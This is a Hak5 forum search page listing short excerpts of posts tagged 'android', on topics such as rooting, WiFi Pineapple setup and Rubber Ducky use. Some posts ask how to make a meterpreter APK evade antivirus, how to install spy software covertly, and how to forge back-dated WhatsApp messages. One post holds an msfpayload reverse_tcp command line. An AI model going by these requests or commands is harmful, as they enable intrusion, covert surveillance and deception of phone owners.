Jump to content

Search the Community

Showing results for tags 'android'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I got a smoking deal on this LG VK700 Tablet. I'm pretty happy with the device but I'd like to have a root terminal. It's a Linux device and Linux without root feels kinda wierd. Any of you guys rooted one of these things? The carrier is Verizon if that makes a difference. I've looked up instructions on rooting an Android device. But there are a lot of warnings about bricking the device. I'm not totally sure how the whole thing works. I have a micro SD and SD reader along with a Linux machine with MTP installed. Is this going to work or do I need additional hardware?
  2. I have a MK4 on 2.8.1 and when I USB connect my Cyanogen phone, I get an IP on the main control panel, can check for updates, etc. I have JUST recently factory reset the MK4 after a long gap in use that led to me forgetting passwords, etc. When a wireless user connects via karma or directly to the AP, their connection shows up in the log, and they get an IP, but they can't see the Internet. Is there a step I am missing that allows the passthrough? I haven't tried anything because I don't know what to try. A twitter follower (https://twitter.com/W9HAX/status/649056274756304898) suggested IP Passthrough but that didn't work. Something else I am missing? Something I can check? I'm out of ideas. Thanks. S
  3. Hi, I have a great interest in computer security and research exploits and pen-testing techniques as a hobby. Recently I started looking into mobile devices. Android in specific because of the stagefright exploit that was recently released but I'm not an expert so I'm having trouble trying to use it. I usually use metasploit for my testing but not sure how to use the stagefright exploit with it. All I've been able to do so far is create an apk file with an android meterpreter payload and set up a multi handler listener in a vps so I can catch the connections. It works on some phones if it doesn't have any security on them but when they have lookout or some other anti-virus software it kills the sessions or doesn't allow them at all. I'm looking for a little help. Is there a way to encode the apk file so it doesn't get detected by the anti-virus software or another attack that should be more successful like embedding the payload on a web page? Also if anyone can point me in the right direction on how to use the stagefright exploit to create a meterpreter session I would appreciate it. Thanks,
  4. I've never hacked a phone before but with all the buzz about Android lately I figure I should at least try it out. I was looking through available metasploit payloads and there are some shells and meterpreters already available but not really a whole lot of encoding options for ARM based payloads. As far as signatures for go I think I could pretty much change up all of the names of variables and functions names within a given program to random strings. Like pipe them through openssl or truncate the output and use the truncated hash random(random(hash)) and it would come out different for signature. Different checksums and whatnot. I don't have an ARM based computer. Well I ordered an Orange pi plus few days ago. I was going to use it as a file server or run an NES emulator on it. So question: Is there an automated way to create an obfuscated ARM payload and. Do I have to compile it on an ARM processor or can I compile ARM on my core i7. Any I'm thinking if I have the ARM binary I can just objdump it to the desired architecture and use the ASM right? Am I getting ahead of myself here? Who hacks themselves some droids?
  5. Hi everyone, recently I got into using rubber ducky with android phones/tablets. The keyboard shortcut for accessing home (like pressing the home button) is Win key + ESC or Alt + ESC. If I plug normal usb keyboard to the android device, both shortcuts works perfectly. If I try to simulate same shortcut on rubber ducky, it does not work. Any idea what might be causing that? Ducky script IS executed (I put some STRING before the shortcut to test it and it was written down). DELAY 1000 STRING Testing DELAY 400 ALT ESC DELAY 400 GUI ESC I have a feeling the ALT + ESC or WIN + ESC is executed too quickly and android ignores it, but its a wild guess. I would appreciate any advice. Nikedp
  6. My brother got some ransomware on his phone. I would just encrypt and factory reset a couple of times. But I can't access anything on the phone. Any time I try to open up settings it just pops up this fake FBI thing. I need something like DBAN but for an android phone. The only other device I can see it being able to boot from is the micro sd card. But can this thing network boot. Is there a way to boot android any kind of recovery mode? I don't really phones all that good. Ok so I figured out how to boot into safe mode and factory reset the thing. But hey, are there some other nifty ways of gaining access and wiping? Like say I wanted to install ubuntu phone or kali nethunter. There always seems to be some old phones just taking up space in a drawer around here.
  7. So, I discovered I could switch my apn on a metropcs phone without having root. This option completely negates the need for any wiFiRouter apps from the older system to insure the use of hotspot to bypass the speed/throttle built in by most cellular carriers. Then today I discovered my phone has a bug, that I cannot repeat purposefully yet, that cuts off all phone/text/mms capabilities when I switch the apn to the added apn I put in the list. This allows the phone to essentially become a dedicated hotspot. It in turn sparked an idea, that if I could cut off ALL mobile network traffic from within the android system so the processes didn't bog the phone down and cut off the hotspot capabilities that I could essentially turn this phone into a portable/cellular server of sorts. My question is, does anyone have experience with the ubuntu/linux phone installations after rooting their phone and using a multi-boot setup on their phone? or any phone? I figured that if I cloned my sim and used a similar or exact same device type, that I could carry the phone(s) with me to use the cloned sim as the hotspot/server and the phone itself that I use for voice could be the regular device. Essentially, cutting off the data on the original phone and tricking the carrier into thinking the original phone and the cloned sim were the same. Thus if I were to install the server onto the cloned phone, keeping it in proximity wouldn't set off any MAJOR alarms and also allow me to use constant broadband speed cellular hotspot, or host a cool mobile-phone capable webserver. Any thoughts on the idea? or what kind of direction I could take the project? Specs for Rooted phone: LG Leon Android 5.x Network is Metropcs (Tmobile) w/LTE... Also, the other question is, what screencast would be best used on the phone to showcase exactly what I'm talking about so I can better explain what I'm trying to say?
  8. Greetings All! A little back ground, I recently got myself a Kyocera Hydro Life, searching around and trying many methods of doing so, the only way I have found to root the thing is using Root Genius. So that is what I have done, it installs a root management system called "Kinguser" on the device, it seems to do what it supposed to do as far as root management goes. All the Root Checkers say I have access I can browse to the Root Folders and what not, so I am convinced that I do have root permissions. Doing searches on Android forums and general Google searches I can't find anyone claiming malware or steals info, but I would guess most people could care less about it and don't look any further. I attempted to install SuperSU as I know it has a good reputation, but it will not install, not sure if Kinguser is blocking it or if there is another problem. What I want to do is try to figure out if anything fishy is going on. I have a firewall installed and blacklisted Kinguser; however since it has full control of the phone presumably, I don't trust that is doing what I told it to. My next step of testing is connect it to my guest side of my home router and watch the logs and see if there is any fishy traffic happening. Questions: 1> Anyone have any experience with Root Genuis / Kinguser? Is it bad? Am I overly paranoid? 2> What would be my best bet for monitoring the traffic? Thanks for your time and help!
  9. Retail version of the VZ note 4 and a chinease team have created a temporary root method, that apparently lasts until reboot. However, there's been some questions of the security of the phones data and conflicts with SuperSu (with the retail versions). After a virtual OS is loaded on the mircro SD, looks like kingroot exploits the boot loader to boot a OS that is installed on a the micro SD card then, is running in read-only on the locked bootloader and writes over changes in the RAM to give root access to apps. But some users say the more apps they root, the more the phone will reboot itself, I'm guessing Knox is catching the discripencies of the HHD and RAM? 1. I'm not sure how legit the app is and so far it seems like it works for KitKat 4.4.4, not too sure about Lolipop 5.0.1. 2. The SD card would be paritioned with Fat32 and Ext4, seems odd. 3. Retailers encrypt the bootloader with SHA-256, generating hash key seems impossible. 4. Would it be possible to boot into a custom boot loader rather than a OS? Then flash the stock ROM with a new bootloader and OS?
  10. Hi peeps, My pineapple gets delivered (new and shiny in his box) last week. Today I did a little walk in the center of my city and connect my Samsung Android device (4.4.2) to a couple of free open wifi networks. So far so good. All of these networks are saved into my phone's wifi list. At this moment my Pineapple is up and running and the good friends 'Karma' and 'Harvester' are enabled. I can see a lot of probes from people next to me, but not from my telephone. Am I missing something? Thanks for helping me, CK
  11. Just received my pineapple a couple of days ago, yay (with a defective power supply, unfortunately) What is the best practise to control a pineapple from a smartphone? I'm using a Nexus 6, but my browser can't handle the big tiles properly. When entering a big tile, I can't scroll down within that tile. That makes most of the infusions useless to control from a smartphone. I've tried Chrome and Firefox even in "Desktop mode" but still no joy. How do you guys control your pineapple from a smartphone (android in particular)? //WB
  12. hi when i try run this in a command terminal on my vmware kali box i get some message about using msfvenom can someone please turn my code into msfvenom code or whatever i need to make this work for android and armitage. thanks msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=8080 R > nsf-2.apk
  13. Hey gang! Ok so I'm a total Freshman.... I traded in my iPhone 5 for a Samsung Note 3. my VERY first Android phone ever. Any tips or anything I need to download ? B)
  14. Hi. I have some trouble I would like some help on. I have an app called "TV OFF" and its an app that uses your ir blaster to send tv-b-gone codes. However this app also has projectors and the tv-b-gone doesn't so I was wondering if somebody could help me extract the ir codes from the app. I then plan to put them in the tv-b-gone v1.2 firmware and reprogram my chip. The zip file is the app. Extract it and you will get all the source files. Thanks guys TV OFF v1.2.7.zip
  15. i want to test and demo pwning of mobile devices such as Android and iOS. i googled a lot and found a recent example: https://www.youtube.com/watch?v=TbyQoWyaw2g can i achieve the same thing using Pineapple only? right now i am trying to get Kali machine + beef + metasploit working with that module without success (that specific vulnerability). i found in the forum there's something named JasagerPwn that contains beef: https://forums.hak5.org/index.php?showtopic=30588 but don't know if this is an updated infusion or if it was replaced with other infusion. bottom line - is there an infusion or setup with Pineapple that can operate beef against browsers of mobile devices and let me run exploits and to be specific the UXSS demo shown in the movie? will be happy to get your inputs and redirection what is the needed setup i need to focus on? more general questions - what else do you think i can demo on mobile phones/browsers? keylogger? i am looking for something with an affect - visual or sound that can be an action i decide what is the timing (not redirecting to a page that will play wav file). thank you very much! pineapple is so cool - can't wait to understand how deep i can use it
  16. Has anyone installed spy software on android via usb rubber ducky before? I was just wondering if it would make sense to install it that way or if it made more sense to run a brute force on the pin screen. What about if they have password entry instead of pin, has anyone had luck with that? I appreciate any help/info in advance. Have a super day! :)
  17. I am a very new user to the rubber ducky we just recently received a few of them for getting into some cell phones that the users forgot the passwords. I would love some help getting this going could anyone help me out with that. I do understand scripting just not with the HAK5 I am assuming once I see how it actually works with doing the android cracking things will be extremely easy to do even more!! thanks for your help!!
  18. Is there any program or any general way you can type a playload or download a text file with the playload and load it into the usbrubberducky with a otg cable? I am thinking if no why not to make an android text editor with this function? Anyone has any good idea lets put it down and create an app! ! Looking forward to it
  19. i have a bunch of older smartphones a samsung moment is one im trying to figure out how to deploy payloads with cellphones as an alternitive to usb with a standard charger micro usb a samsung moment or android phone as the attack device like store the payloads on sd caed and embedd the payloads in pictures videos etc to me tranferd via email bluetooth post pictures to social media and when someone saves picture to device payload is executed and i am new to the community as well as payloads for remote controlling phones remote root ota over the air password grab cache copy dos ddos redirect to phishing page overclock and zip bomb and chain to make target phone distribute payload to gather network infomation on outher devices without knowing it with option to send new pay load to a device in chain and reports sent from all chain device to one deployer email and the idea is great but i need help to know how too do this as well as use my old samsung moment to inject payloads to computer or anything with a usb port includeing routers to exploit please help and any links or how too on third party deployment would be a great help
  20. Hi, Is there any way I can insert a message between two old messages on WhatsApp, to make it appear as though that message was sent at the time, rather than now? I want the other person in the conversation to see the message as well, not just me. If it helps, I'm using a Samsung galaxy s4 mini with android. Thanks
  21. Hey guys, I've been playing around with the idea of making a small pwn platform with functionality of metasploit with the wifipineapple. What I have come up with is this: It is android 4.4 with kali installed through linux deploy with a apple USB-eth adapter into the pineapple with an iframe on nodogsplash (or through ettercap-dns spoof ;D) linking to browser_autopwn. It is in the early stages but i want to either make the phone give me a notification (perhaps notify my android) to let me know when i have a shell or connect back through 3G/4G (yes I am from Australia) so i can leave it somewhere and have a not have to send everything through the network. The phone is a samsung galaxy s4, originally I cracked the screen so I used it as my play phone and then once I started building it I had the screen replaced. I have not field tested it yet as I do not have a spare SIM card. Any thoughts ideas or critisisms are welcomed. Also I would be interested If anyone else has attempted this. Disclaimer: I use this setup to test computers which I own and I use it as a proof of concept Zalgo p.s. First post so if I broke any rules I appologise
  22. I am going to be working on an project with ducky script for android , be on the look out
  23. Hello everyone I want to say first i am a big fan of HAK5 and i want to apologize for my english (i m french) So, i have a friend with a Lg Optimus phone block after tries to find the scheme to unlock the phone and spy messages, calls.. by his wife He asks me if i can unblock it, but he has created a google account when he bought the phone and did not remember it. Is there a way to get the data or find the email account with the phone number or something else? We have all proofs that he is the phone owner... Thanks for your help
  24. Big Up Date The Project is now at Halt due to fact that my Rubber Ducky Has Red Light And i cant fix it so i will be buying a new one after i saved up for WiFi Pineapple i will be still coding it but cant really test any thing that needs a rubber ducky SORRY Read Me First This project was pick up From Hak5 User SEE CREDITS FOR NAME'S But seem project was drop so i takeing on my self to carry this on due to amount of people Requesting this am not coder i only really know batch (KILL me i know) i fort why not make something of use and not other webpage reader like android store is full of them so this will take time more time than any one else so thanks Know Bug's 1.Load Payload dose not work 2.save .bin dose not save to cd but to phone internal memory Credit Old Project Owner: joseph pintozzi I have given right to edit this project and give modified Project away UPDATE'S V0.0.1 Exported project to android studio ( taken me last 2 days to fix it all then Google make update that make all my work go to hell so GG all fixed now) Working on save as it not playing nice may need to make folder for all saved for trying to work out how to make it open ever .text or .bin will look about may need some help google my friend ========================================================================================== Q1.Will it be on Google store A1.i hope so but google may not like what it used for but i cant see why not they have terminal so why hell not i will be email them to see were i stand Dont worry if not i will Host it on my own site For you guys Q2.How much will this cost? A2.Free Why? one it not my it free code and two Shareing is caring Q3.Can we the users help ? A3.God yes i will all ways love your input and help as i said i am very new so it will help me if i am stuck Q4.Can we ask for stuff to be added ? A4.Yes but keep in mind i am new But ye for sure i cant think this all out on my own If you like to post in Q&A Just put Q.A In your pm or comment and it will be add ==========================================================================================
  25. These are only a few that I found so far, I will be running more tests on other android devices soon. Tested : LG G2 GUI e - Opens an Email (most likely Gmail) GUI p - Opens Google Play Music GUI a - Opens Calculator GUI s - Opens Messages GUI l - Opens Calender GUI c - Opens Contacts GUI b - Opens Browser CTRL p - Open System Settings CTRL SPACE - Google Search Upcoming Tests : LG G2 Droid DNA Samsung Galaxy S5 I will keep this updated with all shortcuts that anyone already knows and that gets verified , Hope you all Find this Helpful . I noticed that there isn't much in these forums about commands on android devices for the USB Rubber Ducky , that i could find anyway . Have a Good day and don't Forget to Like this if it helps you. (:
  • Create New...